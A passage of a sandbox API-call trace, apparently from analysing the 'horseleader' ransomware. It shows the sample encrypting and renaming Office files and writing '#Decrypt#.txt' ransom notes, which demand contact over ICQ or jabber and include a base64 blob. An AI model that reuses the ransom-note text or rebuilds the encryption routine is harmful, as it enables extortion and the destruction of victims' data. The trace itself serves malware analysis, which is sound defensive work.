installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.877] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.878] lstrlenA (lpString="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") returned 1368 [0244.878] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.878] CloseHandle (hObject=0x1a4) returned 1 [0244.879] GetProcessHeap () returned 0x780000 [0244.879] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.879] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Publisher.en-us", cAlternateFileName="PUBLIS~1.EN-")) returned 1 [0244.879] lstrcmpiW (lpString1="Publisher.en-us", lpString2="Windows") returned -1 [0244.879] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us") returned 99 [0244.879] lstrcmpW (lpString1="Publisher.en-us", lpString2=".") returned 1 [0244.879] lstrcmpW (lpString1="Publisher.en-us", lpString2="..") returned 1 [0244.879] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us", lpString2="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop") returned -1 [0244.879] GetProcessHeap () returned 0x780000 [0244.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.879] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*") returned 101 [0244.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.880] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.880] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\.") returned 101 [0244.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.881] wnsprintfW (in: 
pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\..") returned 102 [0244.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1ba9ab90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="PublisherMUI.XML", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0244.881] lstrcmpiW (lpString1="PublisherMUI.XML", lpString2="Windows") returned -1 [0244.881] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 116 [0244.881] StrStrIW (lpFirst="PublisherMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.881] lstrcmpW (lpString1="PublisherMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.881] lstrcmpW (lpString1="PublisherMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.881] lstrlenW (lpString=".testttjffg") returned 11 [0244.881] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.881] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.881] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, 
pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 116 [0244.882] StrStrW (lpFirst="PublisherMUI.XML", lpSrch=".txt") returned 0x0 [0244.882] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1450) returned 1 [0244.882] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.884] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.885] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.885] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.885] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.885] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, 
lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.885] CloseHandle (hObject=0x15c) returned 1 [0244.885] GetProcessHeap () returned 0x780000 [0244.885] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.885] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.horseleader") returned 128 [0244.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.horseleader")) returned 1 [0244.886] GetProcessHeap () returned 0x780000 [0244.886] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.886] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.887] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.887] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 109 [0244.887] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.887] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.887] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.887] lstrlenW (lpString=".testttjffg") returned 11 [0244.887] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.887] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.887] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.887] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.888] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 109 [0244.888] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.888] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1608) returned 1 [0244.889] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x648, lpOverlapped=0x0) returned 1 [0244.891] 
SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.891] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x648, lpOverlapped=0x0) returned 1 [0244.891] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.891] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.891] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.891] CloseHandle (hObject=0x15c) returned 1 [0244.892] GetProcessHeap () returned 0x780000 [0244.892] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.892] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.horseleader") returned 121 [0244.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 
controller\\publisher.en-us\\setup.xml.horseleader")) returned 1 [0244.893] GetProcessHeap () returned 0x780000 [0244.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.893] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.893] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.893] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\#Decrypt#.txt") returned 113 [0244.893] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.896] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.896] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.898] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.898] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.898] CloseHandle (hObject=0x1a4) returned 1 [0244.898] 
GetProcessHeap () returned 0x780000 [0244.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.898] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cba0700, ftCreationTime.dwHighDateTime=0x1cb7664, ftLastAccessTime.dwLowDateTime=0xd78c2600, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8cba0700, ftLastWriteTime.dwHighDateTime=0x1cb7664, nFileSizeHigh=0x0, nFileSizeLow=0x150378, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0244.898] lstrcmpiW (lpString1="Setup.exe", lpString2="Windows") returned -1 [0244.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 93 [0244.899] StrStrIW (lpFirst="Setup.exe", lpSrch=".horseleader") returned 0x0 [0244.899] lstrcmpW (lpString1="Setup.exe", lpString2="#Decrypt#.txt") returned 1 [0244.899] lstrcmpW (lpString1="Setup.exe", lpString2="_uninstalling_.png") returned 1 [0244.899] lstrlenW (lpString=".testttjffg") returned 11 [0244.899] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe", lpSrch=".testttjffg") returned 0x0 [0244.899] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.899] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 
controller\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 93 [0244.915] StrStrW (lpFirst="Setup.exe", lpSrch=".txt") returned 0x0 [0244.915] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1377144) returned 1 [0244.915] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.915] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.918] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.919] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.919] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa59bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.919] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.922] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14b378, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.922] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.924] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.924] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.925] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.925] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.925] WriteFile (in: 